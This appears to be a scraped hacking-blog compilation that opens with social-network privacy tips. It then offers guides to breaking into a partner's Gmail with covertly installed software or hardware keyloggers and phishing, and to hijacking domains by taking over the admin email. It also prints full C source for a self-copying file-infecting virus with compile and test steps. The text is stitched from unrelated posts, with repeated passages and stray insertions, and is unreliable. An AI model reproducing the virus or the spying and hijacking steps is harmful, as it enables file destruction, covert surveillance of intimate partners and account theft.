Keep Protect Your FaceBook and Twitter Privacy

surfing the web no longer a solo activity. Facebook, Twitter, and other social networks have quickly become an integral part of the online culture, and with them comes an array of serious threats to your privacy. In this article, I’ll identify some of the key dangers of social networking and offer a few easy steps that you can take to stay safe online. Social networking is built on the idea of sharing information openly and fostering a sense of community. Unfortunately, an online network of individuals who actively share their experiences and seek connections with other like-minded people can be easy prey for hackers engaged in social engineering and phishing attacks. It’s important to be aware of the threats and to use discretion in all of your online interactions.

ke Care Before You Share Online
For starters, even in an open community of sharing, you should observe commonsense boundaries. As President Obama warned students in his September address to schools, “be careful what you post on Facebook. Whatever you do, it will be pulled up again later somewhere in your life.” The core truth of that statement can be applied to any social networking site, and possibly to the Internet as a whole. As a general rule, refrain from posting things online that you will regret later. The odds are good that someone, someday, will stumble across it, and it may come back to haunt you— especially if you are planning to run for public office. If you think that abstaining from posting embarrassing or inflammatory comments online ruins the fun, you’re playing a dangerous game. Remember who your friends are, and know that a friend of a friend can be an enemy.

Don’t Lose Sight of Who Your Friends Are
When you write a Twitter tweet or post a Facebook status update, you have to keep your audience in mind. More and more these days, we hear stories about people who forgot that their boss was part of their network and then said things online that resulted in their being reprimanded or even fired. The adverse consequences of posting inappropriate on line comments have become so commonplace—at least anecdotally—that they have earned an entry in the Urban Dictionary: Facebook fired. Even announcing something as seemingly innocuous as “I’m bored” in a status up - date during work hours can have dire consequences if the wrong people see it. With services like Twitter, and with the recent changes to Facebook that permit any interested party to view and search your updates, you really have no way to hide.

Recognize the Visibility of Your Posts
You’ve thought it through, and you want to shout to the world how you feel about having to work overtime and during a weekend that you had earmarked for recreational activities. You have checked and double checked, and you’ve determined that your boss is not in your network, so you let loose on the keyboard and speak your mind. Unfortunately, you’re not home free (figuratively speaking) just yet. Being outside of your network, your boss can’t see your post directly, but if a Facebook friend who is connected with your boss comments on your status update—even just to say “I sympathize”— your boss may be able to click on the link through the friend and see your post. Go ahead, be social. Share your trials and tribulations with your growing network of adoring followers. But for your own safety, keep one essential rule in mind: Never post anything online that you wouldn’t be comfortable having everyone you know see—because eventually they probably will see it.

Define the Parameters of Your Privacy
Marrying privacy and social networking may seem terribly unintuitive. How can you be social and open, and yet protect your privacy? Well, just because you are choosing to share some information with a select group of people does not necessarily mean that you want to share everything with everyone, or that you are indifferent about whether the information you share is visible to all. Facebook, in particular, has drawn unwanted attention in connection with various privacy concerns. If you have used Facebook for a while, you may have noticed advertisements that incorporate your friends’ names or photos associated with them. Facebook does provide privacy controls for you to customize the types of information available to thirdparty applications. If you look at the Facebook Ads tab of the privacy controls, though, you’ll notice that it doesn’t give you any way to opt out of the internal Facebook Ads. Instead, it states (alarmingly) that “Facebook strives to create relevant and interesting advertisements to you and your friends.”

Approach Tattletale Quizzes With Caution
For many users, one of the primary attractions of Facebook is the virtually endless selection of games and quizzes. And part of their allure is their social aspect. In the advergames, you compete against your friends; through the quizzes, you learn more about them while being briefl y entertained. The ACLU exposed problems with how much information these quizzes and games share, however. Typically, when a Facebook user initiates a game or quiz, a notice pops up to declare that interacting with the application requires opening access to information; the notice also provides the user the opportunity to opt out and cancel, or to allow the access to continue. The permission page clearly informs the user up front that allowing “access will let [the application] pull your profile information, photos, your friends’ info, and other content that it requires to work.” Under the circumstances, you may wonder (as the ACLU has) why a game or quiz application would “require” access to your friends’ information in order to work.

Facebook Policy Concerns in Canada
Facebook’s privacy policies have run afoul of the Canadian government, too. Canada’s Privacy Commissioner has determined that those policies and practices violate Canadian privacy regulations, and has recommended various changes Facebook should make to comply with them. One of the commissioner’s biggest concerns involves the permanence of accounts and account data. Facebook offers users a way to disable or deactivate an account, but it doesn’t seem to provide a method for completely deleting an account. Photos and status updates might be available long after a user has shut down a Facebook profile. And like the ACLU, the Canadian government is unhappy about the amount of user information that Facebook shares with thirdparty application providers.

Exercise the Privacy Controls You Have
Although the concerns of the ACLU and the Canadian government run a little deeper, Facebook does offer privacy controls for restricting or denying access to information. Since Facebook is a social networking site designed for sharing information, many of the settings are open by default. It is up to you to access the Privacy Settings and configure the options as you see fit. For each available setting, you can choose to share information with Everyone, with My Networks and Friends, with Friends of Friends, or with Only Friends; if you prefer, you can customize the settings to finetune access further.

Beware of Hijacking and Phishing Scams
By its very nature, social networking is all about socializing, which means that users are more than usually disposed to let their guard down and share information. They come to the network to expand their professional connections, reestablish contact with old friends, and communicate in real time with pals and peers. And for predatory bad guys, launching social-engineering and phishing attacks in this convivial environment is like shooting fish in a barrel. Most people know not to respond to e-mail requests from exiled Nigerian royalty promising millions of dollars in return for help smuggling the money out of the country. (Anyone who doesn’t know better probably shouldn’t be on the Internet; such people are a danger to themselves and to others.) But what if a good friend from high school whom you haven’t seen in 18 years sends you a message on Facebook explaining how her wallet was stolen and her car broke down, and asks you to wire money to help her get home? You might be less suspicious than you should be. Attackers have figured out that family and friends are easy prey for sob stories of this type. Using other attacks or methods, they gain access to a Facebook account and hijack it. They change the password so that the legitimate owner can’t get back in, and then they proceed to reach out to the friends of the hijacked account and attempt to extort money such a Facebook message or e-mail plea, pick up the phone and call the person directly to confirm its legitimacy.

Don’t Let a Tiny URL Fool You
Another threat that has emerged recently as a result of social networking is the tiny-URL attack. Some URLs are very long and don’t work well in e-mail or in blog posts, creating a need for URLshortening services. In particular, Twitter, with its 140-character limit, has made the use of URL shortening services such as Bit.ly a virtual necessity. Unfortunately, attackers can exploit a shortened URL to lure users into accessing malicious Web sites. Since the shortened URL consists of a random collection of characters that are unrelated to the actual URL, users cannot easily determine whether it is legitimate or phony. TweetDeck, a very popular application for sending messages in Twitter, provides a ‘Show preview information for short URLs’ option, which offers some protection.
The preview window supplies details about the shortened URL, including the actual long URL that the link leads to. If you aren’t using TweetDeck for Twitter, or if you need to deal with shortened URLs on other sites and services, maintain a healthy dose of skepticism about what might lie behind the obfuscated address that a message points to.

How to Hack a Gmail Account

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages. As a result, sometimes it becomes inevitable for people to hack the email account of their spouse or girlfriend so as to reveal the secret. So, it’s no wonder why many people want to know “how to hack a Gmail account”.
In this post, I am going to tell you some of the Real and Working ways to hack a Gmail account. However, before that, I want to make you aware of the common myths and scams associated with email hacking.
1. There is no readymade software program that can hack Gmail with just a click of a button. So, stay away from those websites that are waiting to rip off your pockets by selling fake products.Water for ElephantsWater for Elephants

2. Most of the email hacking services on the Internet claim to hack Gmail password for just a small fee of say $100. I have personally tested many of those services and all I can tell you that they are nothing more than a scam.
With my experience of over 8 years in the field of ethical hacking and security, I can tell you that there are only two ways to hack Gmail password. They are:
1. Keylogging
2. Phishing

Keylogging: Easiest Way to Hack Gmail

Keylogging is the easiest way to gain access to any email account. Keylogging involves the use of a small program/software called the keylogger (also called as a spy software). This keylogger, when installed on a given computer, will capture each and every keystroke typed on the keyboard including passwords. Keylogger operates in a complete stealth mode and thus remains undetected.
The use of keyloggers doesn’t demand any special knowledge. So, anyone with a basic knowledge of computer can install and use the keylogger. To hack the password, all you need to do is, just install it on the computer of the target user. Once the victim logs into his Gmail account from his/her computer, the login details (username & password) are captured and stored instantly. You can later access the stored logs to find out the password.
But what if you do not have physical access to the computer?
Well, you need not worry since I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the following keylogger as the best:
If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.
NOTE: For more details on how to install and use SniperSpy, read my post: How to use Keyloggers

Phishing:

Phishing is a way to attempt to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a fake login page (or fake website) whose look and feel is almost identical to that of the legitimate websites like Gmail, Yahoo and Hotmail. When the users try to login from these fake pages and enter their passwords there, the login details are stolen away by the hacker.
However, creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers as they are the easiest the safest way.

How to Hack a Bank Account

Security on the Internet is just a dream and you know it. If a hacker wants to do something, he or she can do it. If one system is secure and cannot be hacked, then they will steal the data of someone who has access to it, and then, do the "work" from the inside. Do you think you're safe just because some sites ask you forauthentication? Let me tell you that not even CAPTCHA is secure. Nothing is.http://gohacers4u.blogspot.com

Have you noticed that when you want to do an online transaction the bank site asks you a lot of stuff so that they properly identify you? They go very deep with these questions. Indeed, this is a good thing, otherwise, anybody that would know a little something about you could easily get into your account. This just makes it a little harder for you to be a victim of cyber-fraud, but it does not make it impossible...

Of course, there is the classic way with the hoax site. The hackers get your data by making you visit a clone page of your bank and all the data you enter will be sent to them. But that's for gullible users, you're much smarter than that. Well, so are some hackers. Some browsers store your data, such as passwords, usernames and stuff like that. If you get infected with malware, the data on your PC will be recorded by that certain virus and sent to the hacker without you even knowing it. And sometimes you don't even need to get a virus, you just need to download some JavaScript from some page. Apart from the code that the site requires, it will also have some code that will make the hacker get access to your cookies, thus using them to transfer money, change a password and stuff like that.

It isn't easy for the average Joe to hack your account, but hackers can do it, if they strive hard enough. So what to do? Well, first thing is to be careful what you click on and the second is to deploy good security measures on your computer!

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

Domain Hijacking – How to Hijack a Domain

Domain hijackingIn this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (/, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

With my experience of over 8 years in the field of ethical hacking and security, I can tell you that there are only two ways to hack Gmail password. They are:

2. Phishing

But what if you do not have physical access to the computer?
Well, you need not worry since I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the following keylogger as the best:
  • SniperSpy – for Windows (Tested)
  • SniperSpy – for Mac (Tested)

How to Hack an Email using Hardware Keylogger

Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger. If you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer my previous post Hacking an email account. Here I’ll give a breif description about keyloggers.
A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.
Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.

Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.

What to Do When Your Email Account is Hacked?

How to Recover Hacked Email Accounts?

Email Hacked?It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

For Gmail:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
Gmail Password Reset Link
If you cannot find success from the Step-1 then proceed to Step-2.
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link
Account Recovery Form

For Yahoo and Hotmail:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option.
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected!
